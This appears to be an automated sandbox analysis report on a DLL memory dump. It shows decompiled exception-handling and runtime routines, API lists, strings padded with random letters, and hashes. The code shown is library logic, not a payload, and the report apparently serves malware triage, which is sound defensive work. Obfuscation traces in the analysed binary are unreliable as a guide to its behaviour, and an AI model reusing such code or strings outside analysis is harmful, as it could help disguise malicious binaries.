								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6F24F563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6F24CCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6F24CCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6F24CCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6F24C46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6F24CFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6F24CA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6F24DA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6F24DA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6F24F50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6F24D6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, ?str?) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6F24CA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6F24D6C1( &_v64);
											E6F24C29C( &_v64, 0x6f287f7c);
											L63:
											 *(E6F24CCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6F24CCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6F24C65D(_t279, _t319, _t274);
											E6F24D945(_a8, _a16, _t305);
											_t235 = E6F24DB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6F24D8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                          0x6f24d036
                          0x6f24d03d
                          0x6f24d03f
                          0x6f24d048
                          0x6f24d04e
                          0x6f24d056
                          0x6f24d058
                          0x6f24d05b
                          0x6f24d061
                          0x6f24d3da
                          0x6f24d3da
                          0x6f24d3df
                          0x6f24d3e1
                          0x6f24d3e3
                          0x6f24d3e6
                          0x6f24d3e7
                          0x6f24d3ea
                          0x6f24d3f0
                          0x6f24d50f
                          0x6f24d3f6
                          0x6f24d3f6
                          0x6f24d3f7
                          0x6f24d3f8
                          0x6f24d3ff
                          0x6f24d402
                          0x6f24d405
                          0x6f24d40b
                          0x6f24d40d
                          0x6f24d412
                          0x6f24d415
                          0x6f24d417
                          0x6f24d41d
                          0x6f24d41f
                          0x6f24d425
                          0x6f24d43a
                          0x6f24d43f
                          0x6f24d442
                          0x6f24d444
                          0x6f24d50b
                          0x00000000
                          0x6f24d50c
                          0x6f24d444
                          0x6f24d425
                          0x6f24d41d
                          0x6f24d415
                          0x6f24d44a
                          0x6f24d44d
                          0x6f24d450
                          0x6f24d453
                          0x6f24d456
                          0x6f24d45c
                          0x6f24d46e
                          0x6f24d473
                          0x6f24d476
                          0x6f24d479
                          0x6f24d47c
                          0x6f24d47f
                          0x6f24d482
                          0x6f24d485
                          0x00000000
                          0x00000000
                          0x6f24d48b
                          0x6f24d48b
                          0x6f24d48e
                          0x6f24d491
                          0x6f24d4a0
                          0x6f24d4a1
                          0x6f24d4a1
                          0x6f24d4a3
                          0x6f24d4a6
                          0x00000000
                          0x00000000
                          0x6f24d4a8
                          0x6f24d4ab
                          0x00000000
                          0x00000000
                          0x6f24d4b9
                          0x6f24d4bb
                          0x6f24d4be
                          0x6f24d4c0
                          0x6f24d4c8
                          0x6f24d4c8
                          0x6f24d4cb
                          0x6f24d4cd
                          0x6f24d4cf
                          0x6f24d4eb
                          0x6f24d4f0
                          0x6f24d4f3
                          0x6f24d4f3
                          0x00000000
                          0x6f24d4cb
                          0x6f24d4c2
                          0x6f24d4c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d4f6
                          0x6f24d4f9
                          0x6f24d4fa
                          0x6f24d4fd
                          0x6f24d500
                          0x6f24d503
                          0x6f24d506
                          0x6f24d506
                          0x00000000
                          0x6f24d491
                          0x6f24d510
                          0x6f24d515
                          0x6f24d516
                          0x6f24d519
                          0x6f24d51c
                          0x6f24d51d
                          0x6f24d51e
                          0x6f24d51f
                          0x6f24d522
                          0x6f24d524
                          0x6f24d59c
                          0x6f24d59e
                          0x6f24d59e
                          0x6f24d526
                          0x6f24d526
                          0x6f24d529
                          0x6f24d52c
                          0x00000000
                          0x6f24d52e
                          0x6f24d52e
                          0x6f24d531
                          0x6f24d534
                          0x6f24d53b
                          0x6f24d53b
                          0x6f24d53e
                          0x6f24d540
                          0x6f24d542
                          0x6f24d574
                          0x6f24d574
                          0x6f24d577
                          0x6f24d57e
                          0x6f24d57e
                          0x6f24d581
                          0x6f24d584
                          0x6f24d58b
                          0x6f24d58b
                          0x6f24d58e
                          0x6f24d595
                          0x6f24d597
                          0x6f24d597
                          0x6f24d590
                          0x6f24d590
                          0x6f24d593
                          0x00000000
                          0x00000000
                          0x6f24d593
                          0x6f24d586
                          0x6f24d586
                          0x6f24d589
                          0x00000000
                          0x00000000
                          0x6f24d589
                          0x6f24d579
                          0x6f24d579
                          0x6f24d57c
                          0x00000000
                          0x00000000
                          0x6f24d57c
                          0x6f24d598
                          0x6f24d544
                          0x6f24d544
                          0x6f24d544
                          0x6f24d547
                          0x6f24d547
                          0x6f24d549
                          0x6f24d54b
                          0x00000000
                          0x00000000
                          0x6f24d54d
                          0x6f24d54f
                          0x6f24d563
                          0x6f24d563
                          0x6f24d551
                          0x6f24d551
                          0x6f24d554
                          0x6f24d557
                          0x00000000
                          0x6f24d559
                          0x6f24d559
                          0x6f24d55c
                          0x6f24d55f
                          0x6f24d561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d561
                          0x6f24d557
                          0x6f24d56c
                          0x6f24d56c
                          0x6f24d56e
                          0x00000000
                          0x6f24d570
                          0x6f24d570
                          0x6f24d570
                          0x00000000
                          0x6f24d56e
                          0x6f24d567
                          0x6f24d569
                          0x6f24d569
                          0x00000000
                          0x6f24d569
                          0x6f24d536
                          0x6f24d536
                          0x6f24d539
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d539
                          0x6f24d534
                          0x6f24d52c
                          0x6f24d59f
                          0x6f24d5a3
                          0x6f24d5a3
                          0x6f24d070
                          0x6f24d070
                          0x6f24d079
                          0x6f24d176
                          0x6f24d176
                          0x6f24d179
                          0x00000000
                          0x6f24d0a8
                          0x6f24d0a8
                          0x6f24d0ad
                          0x00000000
                          0x6f24d0b3
                          0x6f24d0b3
                          0x6f24d0bb
                          0x6f24d374
                          0x6f24d378
                          0x6f24d0c1
                          0x6f24d0c6
                          0x6f24d0c9
                          0x6f24d0ce
                          0x6f24d0d5
                          0x6f24d0da
                          0x00000000
                          0x6f24d112
                          0x6f24d11a
                          0x6f24d17e
                          0x6f24d17e
                          0x6f24d181
                          0x6f24d184
                          0x6f24d186
                          0x6f24d189
                          0x6f24d18c
                          0x6f24d192
                          0x6f24d343
                          0x6f24d343
                          0x6f24d346
                          0x00000000
                          0x6f24d348
                          0x6f24d348
                          0x6f24d34b
                          0x00000000
                          0x6f24d351
                          0x6f24d351
                          0x6f24d354
                          0x6f24d357
                          0x6f24d358
                          0x6f24d359
                          0x6f24d35c
                          0x6f24d35d
                          0x6f24d360
                          0x6f24d361
                          0x6f24d366
                          0x00000000
                          0x6f24d366
                          0x6f24d34b
                          0x6f24d198
                          0x6f24d198
                          0x6f24d19c
                          0x00000000
                          0x6f24d1a2
                          0x6f24d1a2
                          0x6f24d1a9
                          0x6f24d1c1
                          0x6f24d1c1
                          0x6f24d1c4
                          0x6f24d1c7
                          0x6f24d1cd
                          0x6f24d1dd
                          0x6f24d1e2
                          0x6f24d1e5
                          0x6f24d1e8
                          0x6f24d1eb
                          0x6f24d1ee
                          0x6f24d1f1
                          0x6f24d1f4
                          0x6f24d1fa
                          0x6f24d1fa
                          0x6f24d1fd
                          0x6f24d200
                          0x6f24d20f
                          0x6f24d210
                          0x6f24d210
                          0x6f24d212
                          0x6f24d215
                          0x6f24d21b
                          0x6f24d21e
                          0x6f24d224
                          0x6f24d226
                          0x6f24d229
                          0x6f24d22c
                          0x6f24d235
                          0x6f24d238
                          0x6f24d23a
                          0x6f24d23a
                          0x6f24d23d
                          0x6f24d240
                          0x6f24d243
                          0x6f24d246
                          0x6f24d249
                          0x6f24d24e
                          0x6f24d24f
                          0x6f24d250
                          0x6f24d251
                          0x6f24d252
                          0x6f24d255
                          0x6f24d257
                          0x6f24d259
                          0x00000000
                          0x6f24d25b
                          0x6f24d25b
                          0x6f24d25b
                          0x6f24d25e
                          0x6f24d261
                          0x6f24d263
                          0x6f24d264
                          0x6f24d269
                          0x6f24d26c
                          0x6f24d26e
                          0x00000000
                          0x00000000
                          0x6f24d270
                          0x6f24d271
                          0x6f24d274
                          0x6f24d276
                          0x00000000
                          0x6f24d278
                          0x6f24d278
                          0x6f24d27b
                          0x6f24d27e
                          0x00000000
                          0x6f24d27e
                          0x00000000
                          0x6f24d276
                          0x6f24d292
                          0x6f24d298
                          0x6f24d2b5
                          0x6f24d2ba
                          0x6f24d2ba
                          0x6f24d2bd
                          0x6f24d2bd
                          0x00000000
                          0x6f24d281
                          0x6f24d281
                          0x6f24d282
                          0x6f24d285
                          0x6f24d288
                          0x6f24d28b
                          0x6f24d28b
                          0x00000000
                          0x6f24d290
                          0x6f24d22c
                          0x6f24d21e
                          0x6f24d2c0
                          0x6f24d2c3
                          0x6f24d2c4
                          0x6f24d2c7
                          0x6f24d2ca
                          0x6f24d2cd
                          0x6f24d2d0
                          0x6f24d2d0
                          0x6f24d2d9
                          0x6f24d2dc
                          0x6f24d2dc
                          0x6f24d1f4
                          0x6f24d2df
                          0x6f24d2e3
                          0x6f24d2e5
                          0x6f24d2e8
                          0x6f24d2ee
                          0x6f24d2ee
                          0x6f24d2f6
                          0x6f24d2fb
                          0x6f24d369
                          0x6f24d369
                          0x6f24d36e
                          0x6f24d372
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d2fd
                          0x6f24d2fd
                          0x6f24d301
                          0x6f24d313
                          0x6f24d316
                          0x6f24d319
                          0x6f24d31b
                          0x6f24d332
                          0x6f24d336
                          0x6f24d33c
                          0x6f24d33d
                          0x6f24d33f
                          0x00000000
                          0x6f24d341
                          0x00000000
                          0x6f24d341
                          0x6f24d31d
                          0x6f24d322
                          0x6f24d325
                          0x6f24d32a
                          0x6f24d32d
                          0x00000000
                          0x6f24d32d
                          0x6f24d303
                          0x6f24d306
                          0x6f24d309
                          0x6f24d30b
                          0x00000000
                          0x6f24d30d
                          0x6f24d30d
                          0x6f24d311
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d311
                          0x6f24d30b
                          0x6f24d301
                          0x6f24d1ab
                          0x6f24d1ab
                          0x6f24d1b2
                          0x00000000
                          0x6f24d1b4
                          0x6f24d1b4
                          0x6f24d1bb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6f24d1bb
                          0x6f24d1b2
                          0x6f24d1a9
                          0x6f24d19c
                          0x6f24d11c
                          0x6f24d124
                          0x6f24d127
                          0x6f24d12c
                          0x6f24d130
                          0x6f24d133
                          0x6f24d139
                          0x6f24d13c
                          0x00000000
                          0x6f24d13e
                          0x6f24d13e
                          0x6f24d141
                          0x6f24d143
                          0x6f24d379
                          0x6f24d379
                          0x00000000
                          0x6f24d149
                          0x6f24d151
                          0x6f24d15c
                          0x00000000
                          0x00000000
                          0x6f24d165
                          0x6f24d168
                          0x6f24d169
                          0x6f24d16c
                          0x6f24d16e
                          0x00000000
                          0x6f24d174
                          0x00000000
                          0x6f24d174
                          0x00000000
                          0x6f24d16e
                          0x6f24d149
                          0x6f24d37e
                          0x6f24d37e
                          0x6f24d380
                          0x6f24d381
                          0x6f24d388
                          0x6f24d38b
                          0x6f24d399
                          0x6f24d39e
                          0x6f24d3a3
                          0x6f24d3a6
                          0x6f24d3ab
                          0x6f24d3ae
                          0x6f24d3b1
                          0x6f24d3b3
                          0x6f24d3b5
                          0x6f24d3b5
                          0x6f24d3ba
                          0x6f24d3c6
                          0x6f24d3cc
                          0x6f24d3d1
                          0x6f24d3d4
                          0x6f24d3d5
                          0x00000000
                          0x6f24d3d5
                          0x6f24d13c
                          0x6f24d11a
                          0x6f24d0da
                          0x6f24d0bb
                          0x6f24d0ad
                          0x6f24d079

                          APIs
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6F24D133
                          • type_info::operator==.LIBVCRUNTIME ref: 6F24D155
                          • ___TypeMatch.LIBVCRUNTIME ref: 6F24D264
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6F24D336
                          • _UnwindNestedFrames.LIBCMT ref: 6F24D3BA
                          • CallUnexpected.LIBVCRUNTIME ref: 6F24D3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm$|$(o
                          • API String ID: 2123188842-27053567
                          • Opcode ID: 8532a58839aedee3126caab27cccad806c93d39da5270d57db78c789755fa4d9
                          • Instruction ID: 8562488467857b9f539a0e30709cf6d5de2b8a57134713cd6d8e263ddf9d0c62
                          • Opcode Fuzzy Hash: 8532a58839aedee3126caab27cccad806c93d39da5270d57db78c789755fa4d9
                          • Instruction Fuzzy Hash: F7B1657580030EEFCF19CFA8C98099EBBB6BF44315B90415AE8156B691D3B4EA51CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C500, Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 6F23C53A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C547
                          • TlsGetValue.KERNEL32(?), ref: 6F23C58A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C597
                          • TlsGetValue.KERNEL32(?), ref: 6F23C5CA
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C5D7
                          • TlsGetValue.KERNEL32(?), ref: 6F23C60A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C617
                          • TlsGetValue.KERNEL32(?), ref: 6F23C64B
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6F23C658
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: 838b3aae1e949e9f80e02442f5755e9ddfc7073851ae8d6579daab9141024baa
                          • Instruction ID: a9e6e2a5173fb0924c43cc91bc06b0ac407b5ee4636615e7c380b3e51d380edb
                          • Opcode Fuzzy Hash: 838b3aae1e949e9f80e02442f5755e9ddfc7073851ae8d6579daab9141024baa
                          • Instruction Fuzzy Hash: 1A41D5F3AD427DEBDB015F649D04BDA37A4EF42B62F045021EE2059241E761EA21DF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F241DA0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6F241C2E,?), ref: 6F241DB5
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6F241C2E,?), ref: 6F241DC6
                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6F241E08
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6F241E83
                          • GetLastError.KERNEL32(?,?,?,00000000), ref: 6F241F05
                          Strings
                          • Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq, xrefs: 6F241FF5
                          • assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed, xrefs: 6F24200E
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ErrorLast$ConsoleFileHandleModeWrite
                          • String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:eodllautblkklahmhgnetilzvvcslfjwakfzrpeciobxpylgwrokyyfkblnopnjvhlcoxjbvrndpaoezowltgjwguuqlcjtinialvpbtfcixalgwrcjcrthjdwukfjvq$assertion failed: !handle.is_null()C:wzsrrzyhpokwddixmxfulwzhcndebeithwkkhwbuyssisqxbeobnryngrerqutlqsjvizxvibhexzqwhpywnaymoprangqwwlydycgacflwbjqxhaclrecozjqfmkoreeed
                          • API String ID: 4172320683-607870617
                          • Opcode ID: 362033da315a8bf6132f75adc044a5959476cb9e5aa3d0e9b4f8ab7f1159d6d6
                          • Instruction ID: cc2fcc02ae6876e1fdc8429cb3912d84218604be3f9609906328b5818a37534c
                          • Opcode Fuzzy Hash: 362033da315a8bf6132f75adc044a5959476cb9e5aa3d0e9b4f8ab7f1159d6d6
                          • Instruction Fuzzy Hash: 1F7113B06087499FD7198F25C84075B7BE5EB86305F00882DE4968B3C0D7B5E999CF23
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6F23C690, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON
                          Download Yara Rule
                          APIs
                          • AcquireSRWLockExclusive.KERNEL32(6F28ADA8), ref: 6F23C6C9
                          • ReleaseSRWLockExclusive.KERNEL32(6F28ADA8), ref: 6F23C713
                          • GetProcessHeap.KERNEL32 ref: 6F23C722
                          • HeapAlloc.KERNEL32(01310000,00000000,00000020), ref: 6F23C735
                          • ReleaseSRWLockExclusive.KERNEL32(6F28ADA8), ref: 6F23C787
                          Strings
                          • failed to generate unique thread ID: bitspace exhausted, xrefs: 6F23C794
                          • called `Option::unwrap()` on a `None` value, xrefs: 6F23C7B7
                          Memory Dump Source
                          • Source File: 00000001.00000002.693304084.000000006F231000.00000020.00020000.sdmp, Offset: 6F230000, based on PE: true
                          • Associated: 00000001.00000002.693289569.000000006F230000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693324082.000000006F258000.00000002.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693371630.000000006F28A000.00000004.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693385358.000000006F28C000.00000008.00020000.sdmp Download File
                          • Associated: 00000001.00000002.693398554.000000006F28D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
                          • String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
                          • API String ID: 1780889587-1657987152
                          • Opcode ID: 2945062b22ac099eea1fa7e1a45fc4a31c87b59f062de43f004f64c8ced776ef
                          • Instruction ID: 8f7916c5054d70a54ef26d797e03bddd9e44c35ac1804045c712cf025da9ad2f
                          • Opcode Fuzzy Hash: 2945062b22ac099eea1fa7e1a45fc4a31c87b59f062de43f004f64c8ced776ef
                          • Instruction Fuzzy Hash: 4B31F4F1E4031D9BDB148F94C9487AEBBF5EB85724F104129D825A77C0DBB4A419CFA2
                          Uniqueness

